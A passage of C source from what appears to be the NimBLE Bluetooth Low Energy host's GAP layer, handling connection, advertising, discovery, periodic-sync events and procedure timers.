ble_gap_extract_conn_cb(conn_handle, &cb, &cb_arg); if (rc != 0) { return rc; } rc = ble_gap_call_event_cb(event, cb, cb_arg); if (rc != 0) { return rc; } return 0; } static bool ble_gap_is_preempted(void) { int i; BLE_HS_DBG_ASSERT(ble_hs_locked_by_cur_task()); if (ble_gap_master.preempted_op != BLE_GAP_OP_NULL) { return true; } for (i = 0; i < BLE_ADV_INSTANCES; i++) { if (ble_gap_slave[i].preempted) { return true; } } return false; } #if NIMBLE_BLE_CONNECT static void ble_gap_master_reset_state(void) { ble_gap_master.op = BLE_GAP_OP_NULL; ble_gap_master.exp_set = 0; ble_gap_master.conn.cancel = 0; ble_hs_timer_resched(); } #endif static void ble_gap_slave_reset_state(uint8_t instance) { ble_gap_slave[instance].op = BLE_GAP_OP_NULL; #if !MYNEWT_VAL(BLE_EXT_ADV) ble_gap_slave[instance].exp_set = 0; ble_hs_timer_resched(); #endif } #if NIMBLE_BLE_CONNECT static bool ble_gap_has_client(struct ble_gap_master_state *out_state) { if (!out_state) { return 0; } return out_state->cb; } static void ble_gap_master_extract_state(struct ble_gap_master_state *out_state, int reset_state) { ble_hs_lock(); *out_state = ble_gap_master; if (reset_state) { ble_gap_master_reset_state(); ble_gap_master.preempted_op = BLE_GAP_OP_NULL; } ble_hs_unlock(); } #endif static void ble_gap_slave_extract_cb(uint8_t instance, ble_gap_event_fn **out_cb, void **out_cb_arg) { ble_hs_lock(); *out_cb = ble_gap_slave[instance].cb; *out_cb_arg = ble_gap_slave[instance].cb_arg; ble_gap_slave_reset_state(instance); ble_hs_unlock(); } static void ble_gap_adv_finished(uint8_t instance, int 
reason, uint16_t conn_handle, uint8_t num_events) { struct ble_gap_event event; ble_gap_event_fn *cb; void *cb_arg; memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_ADV_COMPLETE; event.adv_complete.reason = reason; #if MYNEWT_VAL(BLE_EXT_ADV) event.adv_complete.instance = instance; event.adv_complete.conn_handle = conn_handle; event.adv_complete.num_ext_adv_events = num_events; #endif ble_gap_event_listener_call(&event); ble_gap_slave_extract_cb(instance, &cb, &cb_arg); if (cb != NULL) { cb(&event, cb_arg); } } #if NIMBLE_BLE_CONNECT static int ble_gap_master_connect_failure(int status) { struct ble_gap_master_state state; struct ble_gap_event event; int rc; ble_gap_master_extract_state(&state, 1); if (ble_gap_has_client(&state)) { memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_CONNECT; event.connect.status = status; rc = state.cb(&event, state.cb_arg); } else { rc = 0; } return rc; } static void ble_gap_master_connect_cancelled(void) { struct ble_gap_master_state state; struct ble_gap_event event; ble_gap_master_extract_state(&state, 1); if (state.cb != NULL) { memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_CONNECT; event.connect.conn_handle = BLE_HS_CONN_HANDLE_NONE; if (state.conn.cancel) { /* Connect procedure successfully cancelled. */ event.connect.status = BLE_HS_EAPP; } else { /* Connect procedure timed out. */ event.connect.status = BLE_HS_ETIMEOUT; } state.cb(&event, state.cb_arg); } } #endif #if NIMBLE_BLE_SCAN static void ble_gap_disc_report(void *desc) { struct ble_gap_master_state state; struct ble_gap_event event; memset(&event, 0, sizeof event); #if MYNEWT_VAL(BLE_EXT_ADV) event.type = BLE_GAP_EVENT_EXT_DISC; event.ext_disc = *((struct ble_gap_ext_disc_desc *)desc); #else event.type = BLE_GAP_EVENT_DISC; event.disc = *((struct ble_gap_disc_desc *)desc); #endif ble_gap_master_extract_state(&state, 0); if (ble_gap_has_client(&state)) { state.cb(&event, state.cb_arg); } ble_gap_event_listener_call(&event); } static void ble_gap_disc_complete(void) { struct ble_gap_master_state state; struct ble_gap_event event; memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_DISC_COMPLETE; event.disc_complete.reason = 0; ble_gap_master_extract_state(&state, 1); if (ble_gap_has_client(&state)) { ble_gap_call_event_cb(&event, state.cb, state.cb_arg); } ble_gap_event_listener_call(&event); } #endif static void ble_gap_update_notify(uint16_t conn_handle, int status) { struct ble_gap_event event; memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_CONN_UPDATE; event.conn_update.conn_handle = conn_handle; event.conn_update.status = status; ble_gap_event_listener_call(&event); ble_gap_call_conn_event_cb(&event, conn_handle); /* Terminate the connection on procedure timeout. */ if (status == BLE_HS_ETIMEOUT) { ble_gap_terminate(conn_handle, BLE_ERR_REM_USER_CONN_TERM); } } static uint32_t ble_gap_master_ticks_until_exp(void) { ble_npl_stime_t ticks; if (ble_gap_master.op == BLE_GAP_OP_NULL || !ble_gap_master.exp_set) { /* Timer not set; infinity ticks until next event. */ return BLE_HS_FOREVER; } ticks = ble_gap_master.exp_os_ticks - ble_npl_time_get(); if (ticks > 0) { /* Timer not expired yet. */ return ticks; } /* Timer just expired. */ return 0; } #if !MYNEWT_VAL(BLE_EXT_ADV) static uint32_t ble_gap_slave_ticks_until_exp(void) { ble_npl_stime_t ticks; if (ble_gap_slave[0].op == BLE_GAP_OP_NULL || !ble_gap_slave[0].exp_set) { /* Timer not set; infinity ticks until next event. 
*/ return BLE_HS_FOREVER; } ticks = ble_gap_slave[0].exp_os_ticks - ble_npl_time_get(); if (ticks > 0) { /* Timer not expired yet. */ return ticks; } /* Timer just expired. */ return 0; } #endif /** * Finds the update procedure that expires soonest. * * @param out_ticks_from_now On success, the ticks until the update * procedure's expiry time gets written here. * * @return The connection handle of the update procedure * that expires soonest, or * BLE_HS_CONN_HANDLE_NONE if there are no * active update procedures. */ static uint16_t ble_gap_update_next_exp(int32_t *out_ticks_from_now) { struct ble_gap_update_entry *entry; ble_npl_time_t now; uint16_t conn_handle; int32_t best_ticks; int32_t ticks; BLE_HS_DBG_ASSERT(ble_hs_locked_by_cur_task()); conn_handle = BLE_HS_CONN_HANDLE_NONE; best_ticks = BLE_HS_FOREVER; now = ble_npl_time_get(); SLIST_FOREACH(entry, &ble_gap_update_entries, next) { ticks = entry->exp_os_ticks - now; if (ticks <= 0) { ticks = 0; } if (ticks < best_ticks) { conn_handle = entry->conn_handle; best_ticks = ticks; } } if (out_ticks_from_now != NULL) { *out_ticks_from_now = best_ticks; } return conn_handle; } #if NIMBLE_BLE_SCAN static void ble_gap_master_set_timer(uint32_t ticks_from_now) { ble_gap_master.exp_os_ticks = ble_npl_time_get() + ticks_from_now; ble_gap_master.exp_set = 1; ble_hs_timer_resched(); } #endif #if NIMBLE_BLE_ADVERTISE && !MYNEWT_VAL(BLE_EXT_ADV) static void ble_gap_slave_set_timer(uint32_t ticks_from_now) { ble_gap_slave[0].exp_os_ticks = ble_npl_time_get() + ticks_from_now; ble_gap_slave[0].exp_set = 1; ble_hs_timer_resched(); } #endif #if (NIMBLE_BLE_CONNECT || NIMBLE_BLE_SCAN) /** * Called when an error is encountered while the master-connection-fsm is * active. */ static void ble_gap_master_failed(int status) { switch (ble_gap_master.op) { case BLE_GAP_OP_M_CONN: STATS_INC(ble_gap_stats, initiate_fail); ble_gap_master_connect_failure(status); break; #if NIMBLE_BLE_SCAN case BLE_GAP_OP_M_DISC: STATS_INC(ble_gap_stats, initiate_fail); ble_gap_disc_complete(); ble_gap_master_reset_state(); break; #endif default: BLE_HS_DBG_ASSERT(0); break; } } #endif #if NIMBLE_BLE_CONNECT static void ble_gap_update_failed(uint16_t conn_handle, int status) { struct ble_gap_update_entry *entry; STATS_INC(ble_gap_stats, update_fail); ble_hs_lock(); entry = ble_gap_update_entry_remove(conn_handle); ble_hs_unlock(); ble_gap_update_entry_free(entry); ble_gap_update_notify(conn_handle, status); } #endif void ble_gap_conn_broken(uint16_t conn_handle, int reason) { struct ble_gap_update_entry *entry; struct ble_gap_snapshot snap; struct ble_gap_event event; int rc; memset(&event, 0, sizeof event); snap.desc = &event.disconnect.conn; rc = ble_gap_find_snapshot(conn_handle, &snap); if (rc != 0) { /* No longer connected. */ return; } /* If there was a connection update in progress, indicate to the * application that it did not complete. */ ble_hs_lock(); entry = ble_gap_update_entry_remove(conn_handle); ble_hs_unlock(); if (entry != NULL) { ble_gap_update_notify(conn_handle, reason); ble_gap_update_entry_free(entry); } /* Indicate the connection termination to each module. The order matters * here: gatts must come before gattc to ensure the application does not * get informed of spurious notify-tx events. 
*/ ble_l2cap_sig_conn_broken(conn_handle, reason); ble_sm_connection_broken(conn_handle); ble_gatts_connection_broken(conn_handle); ble_gattc_connection_broken(conn_handle); ble_hs_flow_connection_broken(conn_handle); ble_hs_atomic_conn_delete(conn_handle); event.type = BLE_GAP_EVENT_DISCONNECT; event.disconnect.reason = reason; ble_gap_event_listener_call(&event); ble_gap_call_event_cb(&event, snap.cb, snap.cb_arg); STATS_INC(ble_gap_stats, disconnect); } #if NIMBLE_BLE_CONNECT static void ble_gap_update_to_l2cap(const struct ble_gap_upd_params *params, struct ble_l2cap_sig_update_params *l2cap_params) { l2cap_params->itvl_min = params->itvl_min; l2cap_params->itvl_max = params->itvl_max; l2cap_params->slave_latency = params->latency; l2cap_params->timeout_multiplier = params->supervision_timeout; } #endif void ble_gap_rx_disconn_complete(const struct ble_hci_ev_disconn_cmp *ev) { #if NIMBLE_BLE_CONNECT struct ble_gap_event event; uint16_t handle = le16toh(ev->conn_handle); STATS_INC(ble_gap_stats, rx_disconnect); if (ev->status == 0) { ble_gap_conn_broken(handle, BLE_HS_HCI_ERR(ev->reason)); } else { memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_TERM_FAILURE; event.term_failure.conn_handle = handle; event.term_failure.status = BLE_HS_HCI_ERR(ev->status); ble_gap_event_listener_call(&event); ble_gap_call_conn_event_cb(&event, handle); } #endif } void ble_gap_rx_update_complete(const struct ble_hci_ev_le_subev_conn_upd_complete *ev) { #if NIMBLE_BLE_CONNECT struct ble_gap_update_entry *entry; struct ble_l2cap_sig_update_params l2cap_params; struct ble_gap_event event; struct ble_hs_conn *conn; uint16_t conn_handle; int cb_status; int call_cb; int rc; STATS_INC(ble_gap_stats, rx_update_complete); memset(&event, 0, sizeof event); memset(&l2cap_params, 0, sizeof l2cap_params); ble_hs_lock(); conn_handle = le16toh(ev->conn_handle); conn = ble_hs_conn_find(conn_handle); if (conn != NULL) { switch (ev->status) { case 0: /* Connection successfully updated. */ conn->bhc_itvl = le16toh(ev->conn_itvl); conn->bhc_latency = le16toh(ev->conn_latency); conn->bhc_supervision_timeout = le16toh(ev->supervision_timeout); break; case BLE_ERR_UNSUPP_REM_FEATURE: /* Peer reports that it doesn't support the procedure. This should * only happen if our controller sent the 4.1 Connection Parameters * Request Procedure. If we are the slave, fail over to the L2CAP * update procedure. */ entry = ble_gap_update_entry_find(conn_handle, NULL); if (entry != NULL && !(conn->bhc_flags & BLE_HS_CONN_F_MASTER)) { ble_gap_update_to_l2cap(&entry->params, &l2cap_params); entry->exp_os_ticks = ble_npl_time_get() + ble_npl_time_ms_to_ticks32(BLE_GAP_UPDATE_TIMEOUT_MS); } break; default: break; } } /* We aren't failing over to L2CAP; the update procedure is complete. */ if (l2cap_params.itvl_min == 0) { entry = ble_gap_update_entry_remove(conn_handle); ble_gap_update_entry_free(entry); } ble_hs_unlock(); if (l2cap_params.itvl_min != 0) { rc = ble_l2cap_sig_update(conn_handle, &l2cap_params, ble_gap_update_l2cap_cb, NULL); if (rc == 0) { call_cb = 0; } else { call_cb = 1; cb_status = rc; } } else { call_cb = 1; cb_status = BLE_HS_HCI_ERR(ev->status); } if (call_cb) { ble_gap_update_notify(conn_handle, cb_status); } #endif } /** * Tells you if there is an active central GAP procedure (connect or discover). */ int ble_gap_master_in_progress(void) { return ble_gap_master.op != BLE_GAP_OP_NULL; } static int ble_gap_adv_active_instance(uint8_t instance) { /* Assume read is atomic; mutex not necessary.
*/ return ble_gap_slave[instance].op == BLE_GAP_OP_S_ADV; } /** * Clears advertisement and discovery state. This function is necessary * when the controller loses its active state (e.g. on stack reset). */ void ble_gap_reset_state(int reason) { uint16_t conn_handle; while (1) { conn_handle = ble_hs_atomic_first_conn_handle(); if (conn_handle == BLE_HS_CONN_HANDLE_NONE) { break; } ble_gap_conn_broken(conn_handle, reason); } #if NIMBLE_BLE_ADVERTISE #if MYNEWT_VAL(BLE_EXT_ADV) uint8_t i; for (i = 0; i < BLE_ADV_INSTANCES; i++) { if (ble_gap_adv_active_instance(i)) { /* Indicate to application that advertising has stopped. */ ble_gap_adv_finished(i, reason, 0, 0); } } #else if (ble_gap_adv_active_instance(0)) { /* Indicate to application that advertising has stopped. */ ble_gap_adv_finished(0, reason, 0, 0); } #endif #endif #if (NIMBLE_BLE_SCAN || NIMBLE_BLE_CONNECT) ble_gap_master_failed(reason); #endif } #if NIMBLE_BLE_CONNECT static int ble_gap_accept_master_conn(void) { int rc; switch (ble_gap_master.op) { case BLE_GAP_OP_NULL: case BLE_GAP_OP_M_DISC: rc = BLE_HS_ENOENT; break; case BLE_GAP_OP_M_CONN: rc = 0; break; default: BLE_HS_DBG_ASSERT(0); rc = BLE_HS_ENOENT; break; } if (rc == 0) { STATS_INC(ble_gap_stats, connect_mst); } return rc; } static int ble_gap_accept_slave_conn(uint8_t instance) { int rc; if (instance >= BLE_ADV_INSTANCES) { rc = BLE_HS_ENOENT; } else if (!ble_gap_adv_active_instance(instance)) { rc = BLE_HS_ENOENT; } else { if (ble_gap_slave[instance].connectable) { rc = 0; } else { rc = BLE_HS_ENOENT; } } if (rc == 0) { STATS_INC(ble_gap_stats, connect_slv); } return rc; } #endif #if NIMBLE_BLE_SCAN static int ble_gap_rx_adv_report_sanity_check(const uint8_t *adv_data, uint8_t adv_data_len) { const struct ble_hs_adv_field *flags; int rc; STATS_INC(ble_gap_stats, rx_adv_report); if (ble_gap_master.op != BLE_GAP_OP_M_DISC) { return -1; } /* If a limited discovery procedure is active, discard non-limited * advertisements. 
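 * "Non-limited" means reports whose flags AD field lacks the LE Limited
 * Discoverable bit (BLE_HS_ADV_F_DISC_LTD), which is what the check below
 * tests.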
*/ if (ble_gap_master.disc.limited) { rc = ble_hs_adv_find_field(BLE_HS_ADV_TYPE_FLAGS, adv_data, adv_data_len, &flags); if ((rc == 0) && (flags->length == 2) && !(flags->value[0] & BLE_HS_ADV_F_DISC_LTD)) { return -1; } } return 0; } #endif void ble_gap_rx_adv_report(struct ble_gap_disc_desc *desc) { #if NIMBLE_BLE_SCAN if (ble_gap_rx_adv_report_sanity_check(desc->data, desc->length_data)) { return; } ble_gap_disc_report(desc); #endif } #if MYNEWT_VAL(BLE_EXT_ADV) #if NIMBLE_BLE_SCAN void ble_gap_rx_le_scan_timeout(void) { ble_gap_disc_complete(); } void ble_gap_rx_ext_adv_report(struct ble_gap_ext_disc_desc *desc) { if (ble_gap_rx_adv_report_sanity_check(desc->data, desc->length_data)) { return; } ble_gap_disc_report(desc); } #endif void ble_gap_rx_adv_set_terminated(const struct ble_hci_ev_le_subev_adv_set_terminated *ev) { uint16_t conn_handle; int reason; /* Currently the spec allows only 0x3c and 0x43 when advertising was * stopped due to timeout or reaching the events limit; map this to a * timeout error for now */ if (ev->status) { reason = BLE_HS_ETIMEOUT; conn_handle = 0; } else { reason = 0; conn_handle = le16toh(ev->conn_handle); } ble_gap_adv_finished(ev->adv_handle, reason, conn_handle, ev->num_events); } void ble_gap_rx_scan_req_rcvd(const struct ble_hci_ev_le_subev_scan_req_rcvd *ev) { struct ble_gap_event event; ble_gap_event_fn *cb; void *cb_arg; ble_gap_slave_extract_cb(ev->adv_handle, &cb, &cb_arg); if (cb != NULL) { memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_SCAN_REQ_RCVD; event.scan_req_rcvd.instance = ev->adv_handle; event.scan_req_rcvd.scan_addr.type = ev->peer_addr_type; memcpy(event.scan_req_rcvd.scan_addr.val, ev->peer_addr, BLE_DEV_ADDR_LEN); cb(&event, cb_arg); } } #endif /* Periodic adv events */ #if MYNEWT_VAL(BLE_PERIODIC_ADV) void ble_gap_rx_peroidic_adv_sync_estab(const struct ble_hci_ev_le_subev_periodic_adv_sync_estab *ev) { uint16_t sync_handle; struct ble_gap_event event; ble_gap_event_fn *cb; void *cb_arg; memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_PERIODIC_SYNC; event.periodic_sync.status = ev->status; ble_hs_lock(); BLE_HS_DBG_ASSERT(ble_gap_sync.psync); if (!ev->status) { sync_handle = le16toh(ev->sync_handle); ble_gap_sync.psync->sync_handle = sync_handle; ble_gap_sync.psync->adv_sid = ev->sid; memcpy(ble_gap_sync.psync->advertiser_addr.val, ev->peer_addr, 6); ble_gap_sync.psync->advertiser_addr.type = ev->peer_addr_type; ble_gap_sync.psync->cb = ble_gap_sync.cb; ble_gap_sync.psync->cb_arg = ble_gap_sync.cb_arg; event.periodic_sync.sync_handle = sync_handle; event.periodic_sync.sid = ev->sid; event.periodic_sync.adv_addr = ble_gap_sync.psync->advertiser_addr; event.periodic_sync.adv_phy = ev->phy; event.periodic_sync.per_adv_ival = ev->interval; event.periodic_sync.adv_clk_accuracy = ev->aca; ble_hs_periodic_sync_insert(ble_gap_sync.psync); } else { ble_hs_periodic_sync_free(ble_gap_sync.psync); } cb = ble_gap_sync.cb; cb_arg = ble_gap_sync.cb_arg; ble_gap_sync.op = BLE_GAP_OP_NULL; ble_gap_sync.cb = NULL; ble_gap_sync.cb_arg = NULL; ble_gap_sync.psync = NULL; ble_hs_unlock(); ble_gap_event_listener_call(&event); if (cb) { cb(&event, cb_arg); } } void ble_gap_rx_periodic_adv_rpt(const struct ble_hci_ev_le_subev_periodic_adv_rpt *ev) { struct ble_hs_periodic_sync *psync; struct ble_gap_event event; ble_gap_event_fn *cb; void *cb_arg; ble_hs_lock(); psync = ble_hs_periodic_sync_find_by_handle(le16toh(ev->sync_handle)); if (psync) { cb = psync->cb; cb_arg = psync->cb_arg; } ble_hs_unlock(); if (!psync || !cb) { return; }
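 /* The cb/cb_arg pair was snapshotted under ble_hs_lock() above; per the
  * thread-safety notes at the top of this file, the callback must run with
  * the mutex released. */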
memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_PERIODIC_REPORT; event.periodic_report.sync_handle = psync->sync_handle; event.periodic_report.tx_power = ev->tx_power; event.periodic_report.rssi = ev->rssi; event.periodic_report.data_status = ev->data_status; event.periodic_report.data_length = ev->data_len; event.periodic_report.data = ev->data; /* TODO should we allow for listener too? this can be spammy and is more * like ACL data, not general event */ cb(&event, cb_arg); } void ble_gap_rx_periodic_adv_sync_lost(const struct ble_hci_ev_le_subev_periodic_adv_sync_lost *ev) { struct ble_hs_periodic_sync *psync; struct ble_gap_event event; ble_gap_event_fn *cb; void *cb_arg; ble_hs_lock(); /* The handle must be in the list */ psync = ble_hs_periodic_sync_find_by_handle(le16toh(ev->sync_handle)); BLE_HS_DBG_ASSERT(psync); cb = psync->cb; cb_arg = psync->cb_arg; /* Remove the handle from the list */ ble_hs_periodic_sync_remove(psync); ble_hs_unlock(); memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_PERIODIC_SYNC_LOST; event.periodic_sync_lost.sync_handle = psync->sync_handle; event.periodic_sync_lost.reason = BLE_HS_ETIMEOUT; /* remove any sync_lost event from queue */ ble_npl_eventq_remove(ble_hs_evq_get(), &psync->lost_ev); /* Free the memory occupied by psync as it is no longer needed */ ble_hs_periodic_sync_free(psync); ble_gap_event_listener_call(&event); if (cb) { cb(&event, cb_arg); } } #endif #if MYNEWT_VAL(BLE_PERIODIC_ADV_SYNC_TRANSFER) static int periodic_adv_transfer_disable(uint16_t conn_handle) { struct ble_hci_le_periodic_adv_sync_transfer_params_cp cmd; struct ble_hci_le_periodic_adv_sync_transfer_params_rp rsp; uint16_t opcode; int rc; opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_PERIODIC_ADV_SYNC_TRANSFER_PARAMS); cmd.conn_handle = htole16(conn_handle); cmd.sync_cte_type = 0x00; cmd.mode = 0x00; cmd.skip = 0x0000; cmd.sync_timeout = 0x000a; rc = ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), &rsp, sizeof(rsp)); if (!rc) { BLE_HS_DBG_ASSERT(le16toh(rsp.conn_handle) == conn_handle); } return rc; } void ble_gap_rx_periodic_adv_sync_transfer(const struct ble_hci_ev_le_subev_periodic_adv_sync_transfer *ev) { struct ble_hci_le_periodic_adv_term_sync_cp cmd_term; struct ble_gap_event event; struct ble_hs_conn *conn; ble_gap_event_fn *cb; uint16_t sync_handle; uint16_t conn_handle; uint16_t opcode; void *cb_arg; conn_handle = le16toh(ev->conn_handle); ble_hs_lock(); /* Unfortunately spec sucks here as it doesn't explicitly stop * transfer reception on first transfer... for now just disable it on * every transfer event we get. 
*/ periodic_adv_transfer_disable(conn_handle); conn = ble_hs_conn_find(le16toh(ev->conn_handle)); if (!conn || !conn->psync) { /* terminate sync if we didn't expect it */ if (!ev->status) { opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_PERIODIC_ADV_TERM_SYNC); cmd_term.sync_handle = ev->sync_handle; ble_hs_hci_cmd_tx(opcode, &cmd_term, sizeof(cmd_term), NULL, 0); } ble_hs_unlock(); return; } cb = conn->psync->cb; cb_arg = conn->psync->cb_arg; memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_PERIODIC_TRANSFER; event.periodic_transfer.status = ev->status; /* only the sync handle is not valid on error */ if (ev->status) { sync_handle = 0; ble_hs_periodic_sync_free(conn->psync); } else { sync_handle = le16toh(ev->sync_handle); conn->psync->sync_handle = sync_handle; conn->psync->adv_sid = ev->sid; memcpy(conn->psync->advertiser_addr.val, ev->peer_addr, 6); conn->psync->advertiser_addr.type = ev->peer_addr_type; ble_hs_periodic_sync_insert(conn->psync); } conn->psync = NULL; event.periodic_transfer.sync_handle = sync_handle; event.periodic_transfer.conn_handle = conn_handle; event.periodic_transfer.service_data = le16toh(ev->service_data); event.periodic_transfer.sid = ev->sid; memcpy(event.periodic_transfer.adv_addr.val, ev->peer_addr, 6); event.periodic_transfer.adv_addr.type = ev->peer_addr_type; event.periodic_transfer.adv_phy = ev->phy; event.periodic_transfer.per_adv_itvl = le16toh(ev->interval); event.periodic_transfer.adv_clk_accuracy = ev->aca; ble_hs_unlock(); ble_gap_event_listener_call(&event); if (cb) { cb(&event, cb_arg); } } #endif #if NIMBLE_BLE_CONNECT static int ble_gap_rd_rem_sup_feat_tx(uint16_t handle) { struct ble_hci_le_rd_rem_feat_cp cmd; cmd.conn_handle = htole16(handle); return ble_hs_hci_cmd_tx(BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_RD_REM_FEAT), &cmd, sizeof(cmd), NULL, 0); } #endif /** * Processes an incoming connection-complete HCI event. * The instance parameter is valid only for slave connections. */ int ble_gap_rx_conn_complete(struct ble_gap_conn_complete *evt, uint8_t instance) { #if NIMBLE_BLE_CONNECT struct ble_gap_event event; struct ble_hs_conn *conn; int rc; STATS_INC(ble_gap_stats, rx_conn_complete); /* In the error case *only* the status field is valid, so we determine the * role based on the error code */ if (evt->status != BLE_ERR_SUCCESS) { switch (evt->status) { case BLE_ERR_DIR_ADV_TMO: /* slave role (HD directed advertising) * * with ext advertising this is sent from the set-terminated event */ #if !MYNEWT_VAL(BLE_EXT_ADV) if (ble_gap_adv_active()) { ble_gap_adv_finished(0, 0, 0, 0); } #endif break; case BLE_ERR_UNK_CONN_ID: /* master role */ if (ble_gap_master_in_progress()) { /* Connect procedure successfully cancelled. */ if (ble_gap_master.preempted_op == BLE_GAP_OP_M_CONN) { ble_gap_master_failed(BLE_HS_EPREEMPTED); } else { ble_gap_master_connect_cancelled(); } } break; default: /* this should never happen, unless the controller is broken */ BLE_HS_LOG(INFO, "controller reported invalid error code in conn " "complete event: %u", evt->status); assert(0); break; } return 0; } /* Apply the event to the existing connection if it exists. */ if (ble_hs_atomic_conn_flags(evt->connection_handle, NULL) == 0) { /* XXX: Does this ever happen? */ return 0; } /* This event refers to a new connection.
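 * It is accepted only if a matching master or slave procedure is active;
 * otherwise the switch below rejects it.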
*/ switch (evt->role) { case BLE_HCI_LE_CONN_COMPLETE_ROLE_MASTER: rc = ble_gap_accept_master_conn(); if (rc != 0) { return rc; } break; case BLE_HCI_LE_CONN_COMPLETE_ROLE_SLAVE: rc = ble_gap_accept_slave_conn(instance); if (rc != 0) { return rc; } break; default: BLE_HS_DBG_ASSERT(0); break; } /* We verified that there is a free connection when the procedure began. */ conn = ble_hs_conn_alloc(evt->connection_handle); BLE_HS_DBG_ASSERT(conn != NULL); conn->bhc_itvl = evt->conn_itvl; conn->bhc_latency = evt->conn_latency; conn->bhc_supervision_timeout = evt->supervision_timeout; conn->bhc_master_clock_accuracy = evt->master_clk_acc; if (evt->role == BLE_HCI_LE_CONN_COMPLETE_ROLE_MASTER) { conn->bhc_cb = ble_gap_master.cb; conn->bhc_cb_arg = ble_gap_master.cb_arg; conn->bhc_flags |= BLE_HS_CONN_F_MASTER; conn->bhc_our_addr_type = ble_gap_master.conn.our_addr_type; ble_gap_master_reset_state(); } else { conn->bhc_cb = ble_gap_slave[instance].cb; conn->bhc_cb_arg = ble_gap_slave[instance].cb_arg; conn->bhc_our_addr_type = ble_gap_slave[instance].our_addr_type; #if MYNEWT_VAL(BLE_EXT_ADV) memcpy(conn->bhc_our_rnd_addr, ble_gap_slave[instance].rnd_addr, 6); #endif ble_gap_slave_reset_state(instance); } conn->bhc_peer_addr.type = evt->peer_addr_type; memcpy(conn->bhc_peer_addr.val, evt->peer_addr, 6); conn->bhc_our_rpa_addr.type = BLE_ADDR_RANDOM; memcpy(conn->bhc_our_rpa_addr.val, evt->local_rpa, 6); /* If peer RPA is not set in the event and peer address * is RPA then store the peer RPA address so when the peer * address is resolved, the RPA is not forgotten. */ if (memcmp(BLE_ADDR_ANY->val, evt->peer_rpa, 6) == 0) { if (BLE_ADDR_IS_RPA(&conn->bhc_peer_addr)) { conn->bhc_peer_rpa_addr = conn->bhc_peer_addr; } } else { conn->bhc_peer_rpa_addr.type = BLE_ADDR_RANDOM; memcpy(conn->bhc_peer_rpa_addr.val, evt->peer_rpa, 6); } ble_hs_lock(); memset(&event, 0, sizeof event); ble_hs_conn_insert(conn); ble_hs_unlock(); event.type = BLE_GAP_EVENT_CONNECT; event.connect.conn_handle = evt->connection_handle; event.connect.status = 0; ble_gap_event_listener_call(&event); ble_gap_call_conn_event_cb(&event, evt->connection_handle); ble_gap_rd_rem_sup_feat_tx(evt->connection_handle); return 0; #else return BLE_HS_ENOTSUP; #endif } void ble_gap_rx_rd_rem_sup_feat_complete(const struct ble_hci_ev_le_subev_rd_rem_used_feat *ev) { #if NIMBLE_BLE_CONNECT struct ble_hs_conn *conn; ble_hs_lock(); conn = ble_hs_conn_find(le16toh(ev->conn_handle)); if ((conn != NULL) && (ev->status == 0)) { conn->supported_feat = get_le32(ev->features); } ble_hs_unlock(); #endif } int ble_gap_rx_l2cap_update_req(uint16_t conn_handle, struct ble_gap_upd_params *params) { struct ble_gap_event event; int rc; memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_L2CAP_UPDATE_REQ; event.conn_update_req.conn_handle = conn_handle; event.conn_update_req.peer_params = params; rc = ble_gap_call_conn_event_cb(&event, conn_handle); return rc; } void ble_gap_rx_phy_update_complete(const struct ble_hci_ev_le_subev_phy_update_complete *ev) { struct ble_gap_event event; uint16_t conn_handle = le16toh(ev->conn_handle); memset(&event, 0, sizeof event); event.type = BLE_GAP_EVENT_PHY_UPDATE_COMPLETE; event.phy_updated.status = ev->status; event.phy_updated.conn_handle = conn_handle; event.phy_updated.tx_phy = ev->tx_phy; event.phy_updated.rx_phy = ev->rx_phy; ble_gap_event_listener_call(&event); ble_gap_call_conn_event_cb(&event, conn_handle); } static int32_t ble_gap_master_timer(void) { uint32_t ticks_until_exp; int rc; ticks_until_exp = 
ble_gap_master_ticks_until_exp(); if (ticks_until_exp != 0) { /* Timer not expired yet. */ return ticks_until_exp; } /*** Timer expired; process event. */ switch (ble_gap_master.op) { case BLE_GAP_OP_M_CONN: rc = ble_gap_conn_cancel_tx(); if (rc != 0) { /* Failed to stop connecting; try again in 100 ms. */ return ble_npl_time_ms_to_ticks32(BLE_GAP_CANCEL_RETRY_TIMEOUT_MS); } else { /* Stop the timer now that the cancel command has been acked. */ ble_gap_master.exp_set = 0; /* Timeout gets reported when we receive a connection complete * event indicating the connect procedure has been cancelled. */ /* XXX: Set a timer to reset the controller if a connection * complete event isn't received within a reasonable interval. */ } break; case BLE_GAP_OP_M_DISC: #if NIMBLE_BLE_SCAN && !MYNEWT_VAL(BLE_EXT_ADV) /* When a discovery procedure times out, it is not a failure. */ rc = ble_gap_disc_enable_tx(0, 0); if (rc != 0) { /* Failed to stop discovery; try again in 100 ms. */ return ble_npl_time_ms_to_ticks32(BLE_GAP_CANCEL_RETRY_TIMEOUT_MS); } ble_gap_disc_complete(); #else assert(0); #endif break; default: BLE_HS_DBG_ASSERT(0); break; } return BLE_HS_FOREVER; } #if !MYNEWT_VAL(BLE_EXT_ADV) static int32_t ble_gap_slave_timer(void) { uint32_t ticks_until_exp; int rc; ticks_until_exp = ble_gap_slave_ticks_until_exp(); if (ticks_until_exp != 0) { /* Timer not expired yet. */ return ticks_until_exp; } /*** Timer expired; process event. */ /* Stop advertising. */ rc = ble_gap_adv_enable_tx(0); if (rc != 0) { /* Failed to stop advertising; try again in 100 ms. */ return 100; } /* Clear the timer and cancel the current procedure. */ ble_gap_slave_reset_state(0); /* Indicate to application that advertising has stopped. */ ble_gap_adv_finished(0, BLE_HS_ETIMEOUT, 0, 0); return BLE_HS_FOREVER; } #endif static int32_t ble_gap_update_timer(void) { struct ble_gap_update_entry *entry; int32_t ticks_until_exp; uint16_t conn_handle; do { ble_hs_lock(); conn_handle = 